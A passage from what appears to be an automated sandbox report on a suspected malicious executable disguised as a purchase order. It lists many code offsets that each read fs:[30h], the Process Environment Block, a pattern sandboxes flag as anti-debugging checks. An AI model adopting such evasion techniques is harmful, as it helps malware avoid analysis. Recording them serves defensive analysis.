Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103A5E7 mov ebx, dword ptr fs:[00000030h]	0_2_0103A5E7
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103A5E7 mov eax, dword ptr fs:[00000030h]	0_2_0103A5E7
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010AE5E0 mov eax, dword ptr fs:[00000030h]	0_2_010AE5E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FF640D mov eax, dword ptr fs:[00000030h]	0_2_00FF640D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108C5FC mov eax, dword ptr fs:[00000030h]	0_2_0108C5FC
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01096400 mov eax, dword ptr fs:[00000030h]	0_2_01096400
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01096400 mov eax, dword ptr fs:[00000030h]	0_2_01096400
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01010445 mov eax, dword ptr fs:[00000030h]	0_2_01010445
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01010445 mov eax, dword ptr fs:[00000030h]	0_2_01010445
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01010445 mov eax, dword ptr fs:[00000030h]	0_2_01010445
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01010445 mov eax, dword ptr fs:[00000030h]	0_2_01010445
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01010445 mov eax, dword ptr fs:[00000030h]	0_2_01010445
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01010445 mov eax, dword ptr fs:[00000030h]	0_2_01010445
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01080443 mov eax, dword ptr fs:[00000030h]	0_2_01080443
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102E45E mov eax, dword ptr fs:[00000030h]	0_2_0102E45E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102E45E mov eax, dword ptr fs:[00000030h]	0_2_0102E45E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102E45E mov eax, dword ptr fs:[00000030h]	0_2_0102E45E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102E45E mov eax, dword ptr fs:[00000030h]	0_2_0102E45E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102E45E mov eax, dword ptr fs:[00000030h]	0_2_0102E45E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CA464 mov eax, dword ptr fs:[00000030h]	0_2_010CA464
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108E461 mov eax, dword ptr fs:[00000030h]	0_2_0108E461
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01008470 mov eax, dword ptr fs:[00000030h]	0_2_01008470
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01008470 mov eax, dword ptr fs:[00000030h]	0_2_01008470
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01000485 mov ecx, dword ptr fs:[00000030h]	0_2_01000485
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103648A mov eax, dword ptr fs:[00000030h]	0_2_0103648A
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103648A mov eax, dword ptr fs:[00000030h]	0_2_0103648A
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103648A mov eax, dword ptr fs:[00000030h]	0_2_0103648A
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108C490 mov eax, dword ptr fs:[00000030h]	0_2_0108C490
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010024A2 mov eax, dword ptr fs:[00000030h]	0_2_010024A2
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010024A2 mov ecx, dword ptr fs:[00000030h]	0_2_010024A2
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010344A8 mov eax, dword ptr fs:[00000030h]	0_2_010344A8
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010984BB mov eax, dword ptr fs:[00000030h]	0_2_010984BB
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103E4BC mov eax, dword ptr fs:[00000030h]	0_2_0103E4BC
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010244D1 mov eax, dword ptr fs:[00000030h]	0_2_010244D1
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010244D1 mov eax, dword ptr fs:[00000030h]	0_2_010244D1
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103E4EF mov eax, dword ptr fs:[00000030h]	0_2_0103E4EF
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103E4EF mov eax, dword ptr fs:[00000030h]	0_2_0103E4EF
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010064F0 mov eax, dword ptr fs:[00000030h]	0_2_010064F0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A44F8 mov eax, dword ptr fs:[00000030h]	0_2_010A44F8
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A44F8 mov eax, dword ptr fs:[00000030h]	0_2_010A44F8
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103A4F0 mov eax, dword ptr fs:[00000030h]	0_2_0103A4F0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103A4F0 mov eax, dword ptr fs:[00000030h]	0_2_0103A4F0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108E4F2 mov eax, dword ptr fs:[00000030h]	0_2_0108E4F2
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108E4F2 mov eax, dword ptr fs:[00000030h]	0_2_0108E4F2
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102270D mov eax, dword ptr fs:[00000030h]	0_2_0102270D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102270D mov eax, dword ptr fs:[00000030h]	0_2_0102270D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102270D mov eax, dword ptr fs:[00000030h]	0_2_0102270D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100471B mov eax, dword ptr fs:[00000030h]	0_2_0100471B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100471B mov eax, dword ptr fs:[00000030h]	0_2_0100471B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103A750 mov eax, dword ptr fs:[00000030h]	0_2_0103A750
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01022755 mov eax, dword ptr fs:[00000030h]	0_2_01022755
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01022755 mov eax, dword ptr fs:[00000030h]	0_2_01022755
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01022755 mov eax, dword ptr fs:[00000030h]	0_2_01022755
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01022755 mov ecx, dword ptr fs:[00000030h]	0_2_01022755
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01022755 mov eax, dword ptr fs:[00000030h]	0_2_01022755
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01022755 mov eax, dword ptr fs:[00000030h]	0_2_01022755
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010AE750 mov eax, dword ptr fs:[00000030h]	0_2_010AE750
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01012760 mov ecx, dword ptr fs:[00000030h]	0_2_01012760
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01030774 mov eax, dword ptr fs:[00000030h]	0_2_01030774
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01004779 mov eax, dword ptr fs:[00000030h]	0_2_01004779
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01004779 mov eax, dword ptr fs:[00000030h]	0_2_01004779
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107E79D mov eax, dword ptr fs:[00000030h]	0_2_0107E79D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107E79D mov eax, dword ptr fs:[00000030h]	0_2_0107E79D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107E79D mov eax, dword ptr fs:[00000030h]	0_2_0107E79D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107E79D mov eax, dword ptr fs:[00000030h]	0_2_0107E79D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107E79D mov eax, dword ptr fs:[00000030h]	0_2_0107E79D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107E79D mov eax, dword ptr fs:[00000030h]	0_2_0107E79D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107E79D mov eax, dword ptr fs:[00000030h]	0_2_0107E79D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107E79D mov eax, dword ptr fs:[00000030h]	0_2_0107E79D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107E79D mov eax, dword ptr fs:[00000030h]	0_2_0107E79D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010007A7 mov eax, dword ptr fs:[00000030h]	0_2_010007A7
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0109C7B0 mov eax, dword ptr fs:[00000030h]	0_2_0109C7B0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0109C7B0 mov eax, dword ptr fs:[00000030h]	0_2_0109C7B0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A47B4 mov eax, dword ptr fs:[00000030h]	0_2_010A47B4
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A47B4 mov eax, dword ptr fs:[00000030h]	0_2_010A47B4
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A47B4 mov eax, dword ptr fs:[00000030h]	0_2_010A47B4
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A47B4 mov eax, dword ptr fs:[00000030h]	0_2_010A47B4
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A47B4 mov eax, dword ptr fs:[00000030h]	0_2_010A47B4
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A47B4 mov eax, dword ptr fs:[00000030h]	0_2_010A47B4
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A47B4 mov ecx, dword ptr fs:[00000030h]	0_2_010A47B4
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102E7E0 mov eax, dword ptr fs:[00000030h]	0_2_0102E7E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010D4600 mov eax, dword ptr fs:[00000030h]	0_2_010D4600
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103C620 mov eax, dword ptr fs:[00000030h]	0_2_0103C620
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01000630 mov eax, dword ptr fs:[00000030h]	0_2_01000630
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01030630 mov eax, dword ptr fs:[00000030h]	0_2_01030630
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01088633 mov esi, dword ptr fs:[00000030h]	0_2_01088633
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01088633 mov eax, dword ptr fs:[00000030h]	0_2_01088633
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01088633 mov eax, dword ptr fs:[00000030h]	0_2_01088633
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103C640 mov eax, dword ptr fs:[00000030h]	0_2_0103C640
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103C640 mov eax, dword ptr fs:[00000030h]	0_2_0103C640
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103265C mov eax, dword ptr fs:[00000030h]	0_2_0103265C
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103265C mov ecx, dword ptr fs:[00000030h]	0_2_0103265C
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103265C mov eax, dword ptr fs:[00000030h]	0_2_0103265C
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108E660 mov eax, dword ptr fs:[00000030h]	0_2_0108E660
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103666D mov esi, dword ptr fs:[00000030h]	0_2_0103666D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103666D mov eax, dword ptr fs:[00000030h]	0_2_0103666D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103666D mov eax, dword ptr fs:[00000030h]	0_2_0103666D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01000670 mov eax, dword ptr fs:[00000030h]	0_2_01000670
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042670 mov eax, dword ptr fs:[00000030h]	0_2_01042670
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042670 mov eax, dword ptr fs:[00000030h]	0_2_01042670
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01008690 mov eax, dword ptr fs:[00000030h]	0_2_01008690
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108C691 mov eax, dword ptr fs:[00000030h]	0_2_0108C691
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C86A8 mov eax, dword ptr fs:[00000030h]	0_2_010C86A8
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C86A8 mov eax, dword ptr fs:[00000030h]	0_2_010C86A8
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A86C2 mov eax, dword ptr fs:[00000030h]	0_2_010A86C2
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010006CF mov eax, dword ptr fs:[00000030h]	0_2_010006CF
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010966D0 mov eax, dword ptr fs:[00000030h]	0_2_010966D0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010966D0 mov eax, dword ptr fs:[00000030h]	0_2_010966D0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010AE6D0 mov eax, dword ptr fs:[00000030h]	0_2_010AE6D0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100C6E0 mov eax, dword ptr fs:[00000030h]	0_2_0100C6E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010266E0 mov eax, dword ptr fs:[00000030h]	0_2_010266E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010266E0 mov eax, dword ptr fs:[00000030h]	0_2_010266E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107C6F2 mov eax, dword ptr fs:[00000030h]	0_2_0107C6F2
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107C6F2 mov eax, dword ptr fs:[00000030h]	0_2_0107C6F2
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01056912 mov eax, dword ptr fs:[00000030h]	0_2_01056912
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01032919 mov eax, dword ptr fs:[00000030h]	0_2_01032919
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01032919 mov eax, dword ptr fs:[00000030h]	0_2_01032919
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010D492D mov eax, dword ptr fs:[00000030h]	0_2_010D492D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C892E mov eax, dword ptr fs:[00000030h]	0_2_010C892E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C892E mov eax, dword ptr fs:[00000030h]	0_2_010C892E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107C920 mov ecx, dword ptr fs:[00000030h]	0_2_0107C920
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107C920 mov eax, dword ptr fs:[00000030h]	0_2_0107C920
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107C920 mov eax, dword ptr fs:[00000030h]	0_2_0107C920
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107C920 mov eax, dword ptr fs:[00000030h]	0_2_0107C920
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FF88C8 mov eax, dword ptr fs:[00000030h]	0_2_00FF88C8
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FF88C8 mov eax, dword ptr fs:[00000030h]	0_2_00FF88C8
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0105693A mov eax, dword ptr fs:[00000030h]	0_2_0105693A
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0105693A mov eax, dword ptr fs:[00000030h]	0_2_0105693A
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0105693A mov eax, dword ptr fs:[00000030h]	0_2_0105693A
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103C944 mov eax, dword ptr fs:[00000030h]	0_2_0103C944
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102E94E mov eax, dword ptr fs:[00000030h]	0_2_0102E94E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01024955 mov eax, dword ptr fs:[00000030h]	0_2_01024955
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01024955 mov eax, dword ptr fs:[00000030h]	0_2_01024955
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103C958 mov eax, dword ptr fs:[00000030h]	0_2_0103C958
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101096B mov eax, dword ptr fs:[00000030h]	0_2_0101096B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101096B mov eax, dword ptr fs:[00000030h]	0_2_0101096B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A0980 mov eax, dword ptr fs:[00000030h]	0_2_010A0980
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A0980 mov eax, dword ptr fs:[00000030h]	0_2_010A0980
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103C98F mov eax, dword ptr fs:[00000030h]	0_2_0103C98F
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103C98F mov eax, dword ptr fs:[00000030h]	0_2_0103C98F
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103C98F mov eax, dword ptr fs:[00000030h]	0_2_0103C98F
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100E9A0 mov eax, dword ptr fs:[00000030h]	0_2_0100E9A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100E9A0 mov eax, dword ptr fs:[00000030h]	0_2_0100E9A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100E9A0 mov eax, dword ptr fs:[00000030h]	0_2_0100E9A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100E9A0 mov eax, dword ptr fs:[00000030h]	0_2_0100E9A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100E9A0 mov eax, dword ptr fs:[00000030h]	0_2_0100E9A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100E9A0 mov eax, dword ptr fs:[00000030h]	0_2_0100E9A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100E9A0 mov eax, dword ptr fs:[00000030h]	0_2_0100E9A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100E9A0 mov eax, dword ptr fs:[00000030h]	0_2_0100E9A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100E9A0 mov eax, dword ptr fs:[00000030h]	0_2_0100E9A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010889A0 mov eax, dword ptr fs:[00000030h]	0_2_010889A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010389B0 mov edx, dword ptr fs:[00000030h]	0_2_010389B0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010969B0 mov eax, dword ptr fs:[00000030h]	0_2_010969B0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010969B0 mov eax, dword ptr fs:[00000030h]	0_2_010969B0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010969B0 mov ecx, dword ptr fs:[00000030h]	0_2_010969B0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010089C0 mov eax, dword ptr fs:[00000030h]	0_2_010089C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010089C0 mov eax, dword ptr fs:[00000030h]	0_2_010089C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010D29CF mov eax, dword ptr fs:[00000030h]	0_2_010D29CF
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010D29CF mov eax, dword ptr fs:[00000030h]	0_2_010D29CF
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010009F0 mov eax, dword ptr fs:[00000030h]	0_2_010009F0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010349F0 mov eax, dword ptr fs:[00000030h]	0_2_010349F0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010349F0 mov eax, dword ptr fs:[00000030h]	0_2_010349F0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103C819 mov eax, dword ptr fs:[00000030h]	0_2_0103C819
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103C819 mov eax, dword ptr fs:[00000030h]	0_2_0103C819
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108C870 mov eax, dword ptr fs:[00000030h]	0_2_0108C870
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01026882 mov eax, dword ptr fs:[00000030h]	0_2_01026882
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01026882 mov eax, dword ptr fs:[00000030h]	0_2_01026882
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01026882 mov eax, dword ptr fs:[00000030h]	0_2_01026882
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108488F mov eax, dword ptr fs:[00000030h]	0_2_0108488F
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0104088E mov eax, dword ptr fs:[00000030h]	0_2_0104088E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0104088E mov edx, dword ptr fs:[00000030h]	0_2_0104088E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0104088E mov eax, dword ptr fs:[00000030h]	0_2_0104088E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010128C0 mov eax, dword ptr fs:[00000030h]	0_2_010128C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010128C0 mov eax, dword ptr fs:[00000030h]	0_2_010128C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010128C0 mov eax, dword ptr fs:[00000030h]	0_2_010128C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010128C0 mov eax, dword ptr fs:[00000030h]	0_2_010128C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010128C0 mov eax, dword ptr fs:[00000030h]	0_2_010128C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010128C0 mov eax, dword ptr fs:[00000030h]	0_2_010128C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010128C0 mov eax, dword ptr fs:[00000030h]	0_2_010128C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010128C0 mov eax, dword ptr fs:[00000030h]	0_2_010128C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010128C0 mov eax, dword ptr fs:[00000030h]	0_2_010128C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010128C0 mov eax, dword ptr fs:[00000030h]	0_2_010128C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010128C0 mov eax, dword ptr fs:[00000030h]	0_2_010128C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010128C0 mov eax, dword ptr fs:[00000030h]	0_2_010128C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010128C0 mov eax, dword ptr fs:[00000030h]	0_2_010128C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010008CD mov eax, dword ptr fs:[00000030h]	0_2_010008CD
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010008CD mov eax, dword ptr fs:[00000030h]	0_2_010008CD
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A8F0 mov eax, dword ptr fs:[00000030h]	0_2_0100A8F0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A8F0 mov eax, dword ptr fs:[00000030h]	0_2_0100A8F0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A8F0 mov eax, dword ptr fs:[00000030h]	0_2_0100A8F0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A8F0 mov eax, dword ptr fs:[00000030h]	0_2_0100A8F0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A8F0 mov eax, dword ptr fs:[00000030h]	0_2_0100A8F0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A8F0 mov eax, dword ptr fs:[00000030h]	0_2_0100A8F0
